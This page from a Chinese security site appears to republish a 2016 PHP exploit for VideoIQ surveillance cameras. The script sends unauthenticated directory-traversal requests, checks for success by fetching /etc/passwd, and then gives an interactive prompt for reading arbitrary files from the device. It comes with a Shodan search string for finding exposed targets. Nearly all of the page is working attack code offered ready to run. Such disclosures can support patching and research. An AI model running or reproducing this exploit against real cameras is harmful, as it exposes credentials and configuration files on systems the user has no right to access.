首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VideoIQ Camera - Local File Disclosure
来源:https://www.linkedin.com/in/yakirwizman 作者:Wizman 发布时间:2016-08-23  
<?php
# VideoIQ Camera Remote File Disclosure 0day Exploit
#
# VideoIQ develops intelligent video surveillance cameras using edge video IP security cameras paired with video analytics.
#
# Exploit Coded & Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
 
# Date 20/08/2016
# Shodan Dork       : title:"VideoIQ Camera Login"
# Version Affected  : All Versions
# Vendor Homepage   : http://avigilon.com
# CVE               : N/A
# Description       : VideoIQ is vulnerable to remote file disclosure which allows to any unauthenticated user read any file system including file configurations.
###
# Exploit code:
 
error_reporting(0);
 
$error[0] = "[!] This script is intended to be launched from the cli.";
 
if(php_sapi_name() <> "cli")
    die($error[0]);
     
if($argc < 3) {
    echo("\nUsage  : php {$argv[0]} <host> <port>");
    echo("\nExample: php {$argv[0]} localhost 8080");
    die();
}
 
if(isset($argv[1]) && isset($argv[2])) {
    $host = $argv[1];
    $port = $argv[2];
}
 
$pack = "GET /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C..{FILE_PATH} HTTP/1.0\r\n";
$pack.= "Host: {$host}\r\n";
$pack.= "Connection: close\r\n\r\n";
 
while(1) {
    if(strstr(http_send($host, $port, preg_replace("/{FILE_PATH}/", '/etc/passwd', $pack)), 'root')) {
        echo("\nAnonymous@{$host}:~# cat ");
        if(($file = trim(fgets(STDIN))) == "exit")
            break;
        $ret = http_send($host, $port, preg_replace("/{FILE_PATH}/", $file, $pack));
        if(strstr($ret, '<title>Error 404 NOT_FOUND</title>') || strstr($ret, '<p>Problem accessing') || strstr($ret, '<h2>HTTP ERROR 404</h2>')) {
            echo("cat: {$file}: No such file or directory");
        } else {
            echo($ret);
        }
    } else {
        echo("[-] Server likely not vulnerable.\n");
        break;
    }
}
 
function http_send($host, $port, $pack) {
    if(!($sock = fsockopen($host, $port)))
        die("\n[-] No response from {$host}\n");
    fwrite($sock, $pack);
    $response = explode("\r\n\r\n", stream_get_contents($sock));
    return($response[1]);
}
?>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MESSOA IP Cameras (Multiple Mo
·WordPress 4.5.3 - Directory Tr
·ZYCOO IP Phone System - Remote
·OpenSSHD 7.2p2 - User Enumerat
·Windows - Fileless UAC Protect
·Phoenix Exploit Kit Remote Cod
·SIEMENS IP Camera CCMW1025 x.2
·Prestashop Multi Modules Arbit
·Metasploit Cron Persistence Mo
·NECROSOFT NScan 0.9.1 Buffer O
·Metasploit Service Persistence
·Prestashop Attributewizardpro
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved